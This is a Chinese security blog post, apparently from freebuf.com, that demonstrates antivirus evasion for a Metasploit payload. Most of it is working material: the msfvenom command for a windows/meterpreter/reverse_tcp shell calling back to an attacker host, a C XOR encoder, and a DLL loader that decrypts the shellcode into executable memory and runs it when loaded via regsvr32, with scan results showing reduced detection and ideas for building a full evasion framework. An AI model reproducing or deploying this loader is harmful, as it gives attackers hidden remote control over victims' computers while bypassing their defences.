msfvenom payload 免杀简单实践 – 作者:s0duku

免杀简单实践

实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本
很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己
稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后
用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。

选择payload

这里选择msf的经典payload:windows/meterpreter/reverse_tcp

//生成c形式的payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=7657 -f c

图片[1]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

选择加密方式

这里选择比较简单的逐字符异或加密

//粘贴msf的payload
unsigned char buf[] = "
        ....
        ....

unsigned char KEY = '\x87';//随便选个字符

int main(){
    unsigned int cnt = 1;
    for(unsigned int index=0;index < sizeof(buf);index++){
        buf[index] = buf[index]^KEY;
    }

    printf("\n\tunsigned char buf[]=\n");

    for(unsigned int index=0;index < sizeof(buf);){
        if(cnt==1){
            printf("\"");
        }else if(cnt>15){
            cnt = 1;
            printf("\"\n");
            continue;
        }
        printf("\\x%x",buf[index]);
        index++;
        cnt++;
    }
    if(cnt != 1){
        printf("\"");
    }
    printf(";\n");
}

编译执行获得加密结果

D:\dllmaster>gcc -m32 xorGenerator.c

D:\dllmaster>a.exe

图片[2]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

编写解密模块

//config.h 配置模块,一些基本设置
#define XORBYPASSER '\x87'  
#define DATAEXEC
#define NOWINDOW

//xorBypasser.h
void xorDecoder(unsigned char buf[],unsigned int size);
//xorBypasser.c
#include "config.h"

void xorDecoder(unsigned char buf[],unsigned int size){
    for(unsigned int index=0;index<size;index++){
        #ifdef XORBYPASSER
        buf[index] = buf[index]^XORBYPASSER;
        #endif
    }
}

编写DLL

//DllMain.h

#include "config.h"

void __attribute__((constructor)) DllMain(void);    

//把加密后的payload粘贴过来
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52"
"\x0c\x8b\x52\x14\x89\xe5\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28"
    ....
    ....

//DllMain.c

#include "DllMain.h"
#include <stdio.h>
#include <windows.h>

typedef void (__stdcall *CODE) ();  

void DllMain(){  

    unsigned int buf_size = sizeof(buf);  
    
#ifdef XORBYPASSER
    xorDecoder(buf,buf_size);\\解密payload
#endif  
    
    //这里采用申请内存空间的方式,把payload复制进去执行,也可以将data段设置可执行位直接跳转执行
            PVOID p = NULL;  
    if ((p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)  
        MessageBoxA(NULL, "error", "info", MB_OK);  
    if (!(memcpy(p, buf, sizeof(buf))))  
        MessageBoxA(NULL, "error", "info", MB_OK);  
  
    CODE code =(CODE)p;  
  
    code();  
}

编译测试DLL

gcc -m32 -shared -o master.dll xorBypasser.c DllMain.c

在编写一个注册脚本 保存为test.bat

regsvr32 master.dll

远控端启动multi/handler监听会话
图片[3]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

点击bat,成功上线

图片[4]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

注释掉代码里的XORBYPASSER宏,把payload换回未加密的,生成一个dll来比较下

gcc -m32 -shared -o noob.dll xorBypasser.c DllMain.c

在线查毒检测

master.dll 加密后的payload

图片[5]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科
图片[6]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

noob.dll 未加密的payload

图片[7]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科
图片[8]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科
图片[9]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科
图片[10]-msfvenom payload 免杀简单实践 – 作者:s0duku-安全小百科

基本还是有效果的

后记

这套代码,可以进一步扩展,最简单的可以设计一套bat脚本,利用编译器的预处理,自动化修改源码,然后生成dll
还可以进一步编写更复杂的加密模块,代码混淆,payload分段,设计成免杀框架

来源:freebuf.com 2021-02-22 14:07:19 by: s0duku

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论